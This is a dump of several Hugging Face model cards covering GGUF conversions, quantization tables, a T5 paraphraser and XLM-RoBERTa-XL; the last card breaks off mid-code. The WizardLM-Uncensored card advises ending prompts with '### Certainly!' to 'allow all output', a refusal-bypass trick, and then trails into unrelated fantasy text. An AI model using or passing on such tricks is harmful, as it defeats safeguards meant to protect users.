modelId | author | last_modified | downloads | likes | library_name | tags | pipeline_tag | createdAt | card
---|---|---|---|---|---|---|---|---|---
ddh0/Meta-Llama-3-8B-Instruct-bf16-GGUF | ddh0 | "2024-05-10T16:06:08Z" | 3,671 | 43 | null | [
"gguf",
"text-generation",
"license:llama3",
"region:us"
] | text-generation | "2024-05-10T15:47:56Z" | ---
license: llama3
pipeline_tag: text-generation
---
# Meta-Llama-3-8B-Instruct-bf16-GGUF
This is [meta-llama/Meta-Llama-3-8B-Instruct](https://huggingface.co/meta-llama/Meta-Llama-3-8B-Instruct), converted to GGUF without changing tensor data type. Moreover, the new correct pre-tokenizer `llama-bpe` is used ([ref](https://github.com/ggerganov/llama.cpp/pull/6745#issuecomment-2094991999)), and the EOS token is correctly set to `<|eot_id|>` ([ref](https://huggingface.co/meta-llama/Meta-Llama-3-8B-Instruct/commit/a8977699a3d0820e80129fb3c93c20fbd9972c41)).
The `llama.cpp` output for this model is shown below for reference.
```
Log start
main: build = 2842 (18e43766)
main: built with cc (Debian 12.2.0-14) 12.2.0 for x86_64-linux-gnu
main: seed = 1715355914
llama_model_loader: loaded meta data with 22 key-value pairs and 291 tensors from /media/dylan/SanDisk/LLMs/Meta-Llama-3-8B-Instruct-bf16.gguf (version GGUF V3 (latest))
llama_model_loader: Dumping metadata keys/values. Note: KV overrides do not apply in this output.
llama_model_loader: - kv 0: general.architecture str = llama
llama_model_loader: - kv 1: general.name str = Meta-Llama-3-8B-Instruct
llama_model_loader: - kv 2: llama.block_count u32 = 32
llama_model_loader: - kv 3: llama.context_length u32 = 8192
llama_model_loader: - kv 4: llama.embedding_length u32 = 4096
llama_model_loader: - kv 5: llama.feed_forward_length u32 = 14336
llama_model_loader: - kv 6: llama.attention.head_count u32 = 32
llama_model_loader: - kv 7: llama.attention.head_count_kv u32 = 8
llama_model_loader: - kv 8: llama.rope.freq_base f32 = 500000.000000
llama_model_loader: - kv 9: llama.attention.layer_norm_rms_epsilon f32 = 0.000010
llama_model_loader: - kv 10: general.file_type u32 = 32
llama_model_loader: - kv 11: llama.vocab_size u32 = 128256
llama_model_loader: - kv 12: llama.rope.dimension_count u32 = 128
llama_model_loader: - kv 13: tokenizer.ggml.model str = gpt2
llama_model_loader: - kv 14: tokenizer.ggml.pre str = llama-bpe
llama_model_loader: - kv 15: tokenizer.ggml.tokens arr[str,128256] = ["!", "\"", "#", "$", "%", "&", "'", ...
llama_model_loader: - kv 16: tokenizer.ggml.token_type arr[i32,128256] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...
llama_model_loader: - kv 17: tokenizer.ggml.merges arr[str,280147] = ["Ġ Ġ", "Ġ ĠĠĠ", "ĠĠ ĠĠ", "...
llama_model_loader: - kv 18: tokenizer.ggml.bos_token_id u32 = 128000
llama_model_loader: - kv 19: tokenizer.ggml.eos_token_id u32 = 128009
llama_model_loader: - kv 20: tokenizer.chat_template str = {% set loop_messages = messages %}{% ...
llama_model_loader: - kv 21: general.quantization_version u32 = 2
llama_model_loader: - type f32: 65 tensors
llama_model_loader: - type bf16: 226 tensors
llm_load_vocab: special tokens definition check successful ( 256/128256 ).
llm_load_print_meta: format = GGUF V3 (latest)
llm_load_print_meta: arch = llama
llm_load_print_meta: vocab type = BPE
llm_load_print_meta: n_vocab = 128256
llm_load_print_meta: n_merges = 280147
llm_load_print_meta: n_ctx_train = 8192
llm_load_print_meta: n_embd = 4096
llm_load_print_meta: n_head = 32
llm_load_print_meta: n_head_kv = 8
llm_load_print_meta: n_layer = 32
llm_load_print_meta: n_rot = 128
llm_load_print_meta: n_embd_head_k = 128
llm_load_print_meta: n_embd_head_v = 128
llm_load_print_meta: n_gqa = 4
llm_load_print_meta: n_embd_k_gqa = 1024
llm_load_print_meta: n_embd_v_gqa = 1024
llm_load_print_meta: f_norm_eps = 0.0e+00
llm_load_print_meta: f_norm_rms_eps = 1.0e-05
llm_load_print_meta: f_clamp_kqv = 0.0e+00
llm_load_print_meta: f_max_alibi_bias = 0.0e+00
llm_load_print_meta: f_logit_scale = 0.0e+00
llm_load_print_meta: n_ff = 14336
llm_load_print_meta: n_expert = 0
llm_load_print_meta: n_expert_used = 0
llm_load_print_meta: causal attn = 1
llm_load_print_meta: pooling type = 0
llm_load_print_meta: rope type = 0
llm_load_print_meta: rope scaling = linear
llm_load_print_meta: freq_base_train = 500000.0
llm_load_print_meta: freq_scale_train = 1
llm_load_print_meta: n_yarn_orig_ctx = 8192
llm_load_print_meta: rope_finetuned = unknown
llm_load_print_meta: ssm_d_conv = 0
llm_load_print_meta: ssm_d_inner = 0
llm_load_print_meta: ssm_d_state = 0
llm_load_print_meta: ssm_dt_rank = 0
llm_load_print_meta: model type = 8B
llm_load_print_meta: model ftype = BF16
llm_load_print_meta: model params = 8.03 B
llm_load_print_meta: model size = 14.96 GiB (16.00 BPW)
llm_load_print_meta: general.name = Meta-Llama-3-8B-Instruct
llm_load_print_meta: BOS token = 128000 '<|begin_of_text|>'
llm_load_print_meta: EOS token = 128009 '<|eot_id|>'
llm_load_print_meta: LF token = 128 'Ä'
llm_load_print_meta: EOT token = 128009 '<|eot_id|>'
```
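For a quick test from Python rather than the `llama.cpp` CLI, a minimal sketch using the `llama-cpp-python` bindings is shown below; the local file path is an assumption, so point it at wherever you downloaded the GGUF.
```python
# Minimal sketch using the llama-cpp-python bindings (pip install llama-cpp-python).
# The model path is an assumption -- replace it with your local copy of the GGUF file.
from llama_cpp import Llama

llm = Llama(
    model_path="Meta-Llama-3-8B-Instruct-bf16.gguf",  # hypothetical local path
    n_ctx=8192,  # matches llama.context_length in the metadata above
)

# The chat template and the <|eot_id|> EOS token are stored in the GGUF metadata,
# so chat completion should stop generation at the right place.
out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "Explain what a GGUF file is in one sentence."}],
    max_tokens=128,
)
print(out["choices"][0]["message"]["content"])
```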
|
RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf | RichardErkhov | "2024-06-30T04:57:47Z" | 3,670 | 0 | null | [
"gguf",
"arxiv:2406.14491",
"arxiv:2309.09530",
"region:us"
] | null | "2024-06-30T04:32:56Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
InstructLM-1.3B - GGUF
- Model creator: https://huggingface.co/instruction-pretrain/
- Original model: https://huggingface.co/instruction-pretrain/InstructLM-1.3B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [InstructLM-1.3B.Q2_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q2_K.gguf) | Q2_K | 0.49GB |
| [InstructLM-1.3B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ3_XS.gguf) | IQ3_XS | 0.54GB |
| [InstructLM-1.3B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ3_S.gguf) | IQ3_S | 0.57GB |
| [InstructLM-1.3B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K_S.gguf) | Q3_K_S | 0.56GB |
| [InstructLM-1.3B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ3_M.gguf) | IQ3_M | 0.58GB |
| [InstructLM-1.3B.Q3_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K.gguf) | Q3_K | 0.62GB |
| [InstructLM-1.3B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K_M.gguf) | Q3_K_M | 0.62GB |
| [InstructLM-1.3B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K_L.gguf) | Q3_K_L | 0.67GB |
| [InstructLM-1.3B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ4_XS.gguf) | IQ4_XS | 0.69GB |
| [InstructLM-1.3B.Q4_0.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_0.gguf) | Q4_0 | 0.72GB |
| [InstructLM-1.3B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ4_NL.gguf) | IQ4_NL | 0.73GB |
| [InstructLM-1.3B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_K_S.gguf) | Q4_K_S | 0.73GB |
| [InstructLM-1.3B.Q4_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_K.gguf) | Q4_K | 0.77GB |
| [InstructLM-1.3B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_K_M.gguf) | Q4_K_M | 0.77GB |
| [InstructLM-1.3B.Q4_1.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_1.gguf) | Q4_1 | 0.8GB |
| [InstructLM-1.3B.Q5_0.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_0.gguf) | Q5_0 | 0.87GB |
| [InstructLM-1.3B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_K_S.gguf) | Q5_K_S | 0.87GB |
| [InstructLM-1.3B.Q5_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_K.gguf) | Q5_K | 0.89GB |
| [InstructLM-1.3B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_K_M.gguf) | Q5_K_M | 0.89GB |
| [InstructLM-1.3B.Q5_1.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_1.gguf) | Q5_1 | 0.95GB |
| [InstructLM-1.3B.Q6_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q6_K.gguf) | Q6_K | 1.03GB |
| [InstructLM-1.3B.Q8_0.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q8_0.gguf) | Q8_0 | 1.33GB |
Original model description:
---
license: apache-2.0
datasets:
- tiiuae/falcon-refinedweb
- instruction-pretrain/ft-instruction-synthesizer-collection
language:
- en
---
# Instruction Pre-Training: Language Models are Supervised Multitask Learners
This repo contains the **general models pre-trained from scratch** in our paper [Instruction Pre-Training: Language Models are Supervised Multitask Learners](https://huggingface.co/papers/2406.14491).
We explore supervised multitask pre-training by proposing ***Instruction Pre-Training***, a framework that scalably augments massive raw corpora with instruction-response pairs to pre-train language models. The instruction-response pairs are generated by an efficient instruction synthesizer built on open-source models. In our experiments, we synthesize 200M instruction-response pairs covering 40+ task categories to verify the effectiveness of *Instruction Pre-Training*. *Instruction Pre-Training* outperforms *Vanilla Pre-Training* in both general pre-training from scratch and domain-adaptive continual pre-training. **In pre-training from scratch, *Instruction Pre-Training* not only improves pre-trained base models but also benefits more from further instruction tuning.** In continual pre-training, *Instruction Pre-Training* enables Llama3-8B to be comparable to or even outperform Llama3-70B.
<p align='center'>
<img src="https://cdn-uploads.huggingface.co/production/uploads/66711d2ee12fa6cc5f5dfc89/vRdsFIVQptbNaGiZ18Lih.png" width="400">
</p>
## Resources
**🤗 We share our data and models with example usages, feel free to open any issues or discussions! 🤗**
- Context-Based Instruction Synthesizer: [instruction-synthesizer](https://huggingface.co/instruction-pretrain/instruction-synthesizer)
- Fine-Tuning Data for the Synthesizer: [ft-instruction-synthesizer-collection](https://huggingface.co/datasets/instruction-pretrain/ft-instruction-synthesizer-collection)
- General Models Pre-Trained from Scratch:
- [InstructLM-500M](https://huggingface.co/instruction-pretrain/InstructLM-500M)
- [InstructLM-1.3B](https://huggingface.co/instruction-pretrain/InstructLM-1.3B)
- Domain-Specific Models Pre-Trained from Llama3-8B:
- [Finance-Llama3-8B](https://huggingface.co/instruction-pretrain/finance-Llama3-8B)
- [Biomedicine-Llama3-8B](https://huggingface.co/instruction-pretrain/medicine-Llama3-8B)
- General Instruction-Augmented Corpora: [general-instruction-augmented-corpora](https://huggingface.co/datasets/instruction-pretrain/general-instruction-augmented-corpora)
- Domain-Specific Instruction-Augmented Corpora (no finance data to avoid ethical issues): [medicine-instruction-augmented-corpora](https://huggingface.co/datasets/instruction-pretrain/medicine-instruction-augmented-corpora)
## General Pre-Training From Scratch
We augment the [RefinedWeb corpus](https://huggingface.co/datasets/tiiuae/falcon-refinedweb) with instruction-response pairs generated by our [context-based instruction synthesizer](https://huggingface.co/instruction-pretrain/instruction-synthesizer) to pre-train general language models from scratch.
To evaluate our general base model using the [lm-evaluation-harness framework](https://github.com/EleutherAI/lm-evaluation-harness):
1. Setup dependencies:
```bash
git clone https://github.com/EleutherAI/lm-evaluation-harness
cd lm-evaluation-harness
pip install -e .
```
2. Evaluate:
```bash
MODEL=instruction-pretrain/InstructLM-1.3B
add_bos_token=True # this flag is needed because lm-eval-harness sets add_bos_token to False by default, but our models require add_bos_token to be True
accelerate launch -m lm_eval --model hf \
--model_args pretrained=${MODEL},add_bos_token=${add_bos_token},dtype=float16 \
--gen_kwargs do_sample=False \
--tasks piqa,hellaswag,winogrande \
--batch_size auto \
--num_fewshot 0
accelerate launch -m lm_eval --model hf \
--model_args pretrained=${MODEL},add_bos_token=${add_bos_token},dtype=float16 \
--gen_kwargs do_sample=False \
--tasks social_iqa,ai2_arc,openbookqa,boolq,mmlu \
--batch_size auto \
--num_fewshot 5
```
## Citation
If you find our work helpful, please cite us:
Instruction Pre-Training
```bibtex
@article{cheng2024instruction,
title={Instruction Pre-Training: Language Models are Supervised Multitask Learners},
author={Cheng, Daixuan and Gu, Yuxian and Huang, Shaohan and Bi, Junyu and Huang, Minlie and Wei, Furu},
journal={arXiv preprint arXiv:2406.14491},
year={2024}
}
```
[AdaptLLM](https://huggingface.co/papers/2309.09530)
```bibtex
@inproceedings{
cheng2024adapting,
title={Adapting Large Language Models via Reading Comprehension},
author={Daixuan Cheng and Shaohan Huang and Furu Wei},
booktitle={The Twelfth International Conference on Learning Representations},
year={2024},
url={https://openreview.net/forum?id=y886UXPEZ0}
}
```
|
JasonFuriosa/test-gpt-j-6b | JasonFuriosa | "2024-04-29T13:51:47Z" | 3,669 | 0 | transformers | [
"transformers",
"pytorch",
"gptj",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | "2024-04-29T13:48:20Z" | Entry not found |
mradermacher/Dendrite-L3-10B-i1-GGUF | mradermacher | "2024-06-13T13:46:44Z" | 3,669 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:Envoid/Dendrite-L3-10B",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-13T04:35:21Z" | ---
base_model: Envoid/Dendrite-L3-10B
language:
- en
library_name: transformers
license: cc-by-nc-4.0
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: nicoboss -->
weighted/imatrix quants of https://huggingface.co/Envoid/Dendrite-L3-10B
<!-- provided-files -->
static quants are available at https://huggingface.co/mradermacher/Dendrite-L3-10B-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
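As a concrete (hypothetical) starting point, one way to fetch a single quant from this repo in Python is via `huggingface_hub`; the Q4_K_M file is only an example pick from the table below.
```python
# Minimal sketch: download one quant file with huggingface_hub (pip install huggingface_hub).
# The Q4_K_M file is just an example pick from the table below.
from huggingface_hub import hf_hub_download

path = hf_hub_download(
    repo_id="mradermacher/Dendrite-L3-10B-i1-GGUF",
    filename="Dendrite-L3-10B.i1-Q4_K_M.gguf",
)
print(path)  # local cache path of the downloaded GGUF
```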
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ1_S.gguf) | i1-IQ1_S | 2.5 | for the desperate |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ1_M.gguf) | i1-IQ1_M | 2.7 | mostly desperate |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_XXS.gguf) | i1-IQ2_XXS | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_XS.gguf) | i1-IQ2_XS | 3.2 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_S.gguf) | i1-IQ2_S | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_M.gguf) | i1-IQ2_M | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q2_K.gguf) | i1-Q2_K | 3.9 | IQ3_XXS probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_XXS.gguf) | i1-IQ3_XXS | 4.0 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_XS.gguf) | i1-IQ3_XS | 4.3 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q3_K_S.gguf) | i1-Q3_K_S | 4.5 | IQ3_XS probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_S.gguf) | i1-IQ3_S | 4.5 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_M.gguf) | i1-IQ3_M | 4.7 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q3_K_M.gguf) | i1-Q3_K_M | 5.0 | IQ3_S probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q3_K_L.gguf) | i1-Q3_K_L | 5.3 | IQ3_M probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ4_XS.gguf) | i1-IQ4_XS | 5.5 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q4_0.gguf) | i1-Q4_0 | 5.8 | fast, low quality |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q4_K_S.gguf) | i1-Q4_K_S | 5.8 | optimal size/speed/quality |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q4_K_M.gguf) | i1-Q4_K_M | 6.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q5_K_S.gguf) | i1-Q5_K_S | 6.9 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q5_K_M.gguf) | i1-Q5_K_M | 7.1 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q6_K.gguf) | i1-Q6_K | 8.1 | practically like static Q6_K |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time. Additional thanks to [@nicoboss](https://huggingface.co/nicoboss) for giving me access to his hardware for calculating the imatrix for these quants.
<!-- end -->
|
hetpandya/t5-small-quora | hetpandya | "2021-07-13T12:37:51Z" | 3,668 | 0 | transformers | [
"transformers",
"pytorch",
"t5",
"text2text-generation",
"en",
"dataset:quora",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text2text-generation | "2022-03-02T23:29:05Z" | ---
language: en
datasets:
- quora
---
# T5-small for paraphrase generation
Google's T5-small fine-tuned on [Quora Question Pairs](https://huggingface.co/datasets/quora) dataset for paraphrasing.
## Model in Action 🚀
```python
from transformers import T5ForConditionalGeneration, T5Tokenizer
tokenizer = T5Tokenizer.from_pretrained("hetpandya/t5-small-quora")
model = T5ForConditionalGeneration.from_pretrained("hetpandya/t5-small-quora")
def get_paraphrases(sentence, prefix="paraphrase: ", n_predictions=5, top_k=120, max_length=256, device="cpu"):
    text = prefix + sentence + " </s>"
    encoding = tokenizer.encode_plus(
        text, pad_to_max_length=True, return_tensors="pt"
    )
    input_ids, attention_masks = encoding["input_ids"].to(device), encoding[
        "attention_mask"
    ].to(device)
    # sample several candidate paraphrases from the model
    model_output = model.generate(
        input_ids=input_ids,
        attention_mask=attention_masks,
        do_sample=True,
        max_length=max_length,
        top_k=top_k,
        top_p=0.98,
        early_stopping=True,
        num_return_sequences=n_predictions,
    )
    # keep only candidates that differ from the input and are not duplicates
    outputs = []
    for output in model_output:
        generated_sent = tokenizer.decode(
            output, skip_special_tokens=True, clean_up_tokenization_spaces=True
        )
        if (
            generated_sent.lower() != sentence.lower()
            and generated_sent not in outputs
        ):
            outputs.append(generated_sent)
    return outputs

paraphrases = get_paraphrases("The house will be cleaned by me every Saturday.")
for sent in paraphrases:
    print(sent)
```
## Output
```
My house is up clean on Saturday morning. Thank you for this email. I'm introducing a new name and name. I'm running my house at home. I'm a taller myself. I'm gonna go with it on Monday. (the house will be up cleaned).
Is there anything that will be cleaned every Saturday morning?
The house is clean and will be cleaned each Saturday by my wife.
I will clean the house for almost a week. I have to clean it all the weekend. I will be able to do it. My house is new.
If I clean my house every Monday, I can call it clean.
```
Created by [Het Pandya/@hetpandya](https://github.com/hetpandya) | [LinkedIn](https://www.linkedin.com/in/het-pandya)
Made with <span style="color: red;">♥</span> in India |
Monero/WizardLM-Uncensored-SuperCOT-StoryTelling-30b | Monero | "2023-05-31T05:57:07Z" | 3,666 | 45 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-05-31T02:53:31Z" | This model is a triple model merge of WizardLM Uncensored+CoT+Storytelling, resulting in a comprehensive boost in reasoning and story writing capabilities.
To allow all output, at the end of your prompt add ```### Certainly!```
You've become a compendium of knowledge on a vast array of topics.
Lore Mastery is an arcane tradition fixated on understanding the underlying mechanics of magic. It is the most academic of all arcane traditions. The promise of uncovering new knowledge or proving (or discrediting) a theory of magic is usually required to rouse its practitioners from their laboratories, academies, and archives to pursue a life of adventure. Known as savants, followers of this tradition are a bookish lot who see beauty and mystery in the application of magic. The results of a spell are less interesting to them than the process that creates it. Some savants take a haughty attitude toward those who follow a tradition focused on a single school of magic, seeing them as provincial and lacking the sophistication needed to master true magic. Other savants are generous teachers, countering ignorance and deception with deep knowledge and good humor. |
facebook/xlm-roberta-xxl | facebook | "2022-08-08T07:19:25Z" | 3,665 | 10 | transformers | [
"transformers",
"pytorch",
"xlm-roberta-xl",
"fill-mask",
"multilingual",
"af",
"am",
"ar",
"as",
"az",
"be",
"bg",
"bn",
"br",
"bs",
"ca",
"cs",
"cy",
"da",
"de",
"el",
"en",
"eo",
"es",
"et",
"eu",
"fa",
"fi",
"fr",
"fy",
"ga",
"gd",
"gl",
"gu",
"ha",
"he",
"hi",
"hr",
"hu",
"hy",
"id",
"is",
"it",
"ja",
"jv",
"ka",
"kk",
"km",
"kn",
"ko",
"ku",
"ky",
"la",
"lo",
"lt",
"lv",
"mg",
"mk",
"ml",
"mn",
"mr",
"ms",
"my",
"ne",
"nl",
"no",
"om",
"or",
"pa",
"pl",
"ps",
"pt",
"ro",
"ru",
"sa",
"sd",
"si",
"sk",
"sl",
"so",
"sq",
"sr",
"su",
"sv",
"sw",
"ta",
"te",
"th",
"tl",
"tr",
"ug",
"uk",
"ur",
"uz",
"vi",
"xh",
"yi",
"zh",
"arxiv:2105.00572",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:05Z" | ---
language:
- multilingual
- af
- am
- ar
- as
- az
- be
- bg
- bn
- br
- bs
- ca
- cs
- cy
- da
- de
- el
- en
- eo
- es
- et
- eu
- fa
- fi
- fr
- fy
- ga
- gd
- gl
- gu
- ha
- he
- hi
- hr
- hu
- hy
- id
- is
- it
- ja
- jv
- ka
- kk
- km
- kn
- ko
- ku
- ky
- la
- lo
- lt
- lv
- mg
- mk
- ml
- mn
- mr
- ms
- my
- ne
- nl
- no
- om
- or
- pa
- pl
- ps
- pt
- ro
- ru
- sa
- sd
- si
- sk
- sl
- so
- sq
- sr
- su
- sv
- sw
- ta
- te
- th
- tl
- tr
- ug
- uk
- ur
- uz
- vi
- xh
- yi
- zh
license: mit
---
# XLM-RoBERTa-XL (xxlarge-sized model)
XLM-RoBERTa-XL model pre-trained on 2.5TB of filtered CommonCrawl data containing 100 languages. It was introduced in the paper [Larger-Scale Transformers for Multilingual Masked Language Modeling](https://arxiv.org/abs/2105.00572) by Naman Goyal, Jingfei Du, Myle Ott, Giri Anantharaman, Alexis Conneau and first released in [this repository](https://github.com/pytorch/fairseq/tree/master/examples/xlmr).
Disclaimer: The team releasing XLM-RoBERTa-XL did not write a model card for this model so this model card has been written by the Hugging Face team.
## Model description
XLM-RoBERTa-XL is an extra-large multilingual version of RoBERTa. It is pre-trained on 2.5TB of filtered CommonCrawl data containing 100 languages.
RoBERTa is a transformers model pretrained on a large corpus in a self-supervised fashion. This means it was pretrained on the raw texts only, with no humans labeling them in any way (which is why it can use lots of publicly available data) with an automatic process to generate inputs and labels from those texts.
More precisely, it was pretrained with the Masked language modeling (MLM) objective. Taking a sentence, the model randomly masks 15% of the words in the input, then runs the entire masked sentence through the model and has to predict the masked words. This is different from traditional recurrent neural networks (RNNs) that usually see the words one after the other, or from autoregressive models like GPT which internally mask the future tokens. It allows the model to learn a bidirectional representation of the sentence.
This way, the model learns an inner representation of 100 languages that can then be used to extract features useful for downstream tasks: if you have a dataset of labeled sentences for instance, you can train a standard classifier using the features produced by the XLM-RoBERTa-XL model as inputs.
## Intended uses & limitations
You can use the raw model for masked language modeling, but it's mostly intended to be fine-tuned on a downstream task. See the [model hub](https://huggingface.co/models?search=xlm-roberta-xl) to look for fine-tuned versions on a task that interests you.
Note that this model is primarily aimed at being fine-tuned on tasks that use the whole sentence (potentially masked) to make decisions, such as sequence classification, token classification or question answering. For tasks such as text generation, you should look at models like GPT2.
## Usage
You can use this model directly with a pipeline for masked language modeling:
```python
>>> from transformers import pipeline
>>> unmasker = pipeline('fill-mask', model='facebook/xlm-roberta-xxl')
>>> unmasker("Europe is a <mask> continent.")
[{'score': 0.22996895015239716,
'token': 28811,
'token_str': 'European',
'sequence': 'Europe is a European continent.'},
{'score': 0.14307449758052826,
'token': 21334,
'token_str': 'large',
'sequence': 'Europe is a large continent.'},
{'score': 0.12239163368940353,
'token': 19336,
'token_str': 'small',
'sequence': 'Europe is a small continent.'},
{'score': 0.07025063782930374,
'token': 18410,
'token_str': 'vast',
'sequence': 'Europe is a vast continent.'},
{'score': 0.032869212329387665,
'token': 6957,
'token_str': 'big',
'sequence': 'Europe is a big continent.'}]
```
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import AutoTokenizer, AutoModelForMaskedLM
tokenizer = AutoTokenizer.from_pretrained('facebook/xlm-roberta-xxl')
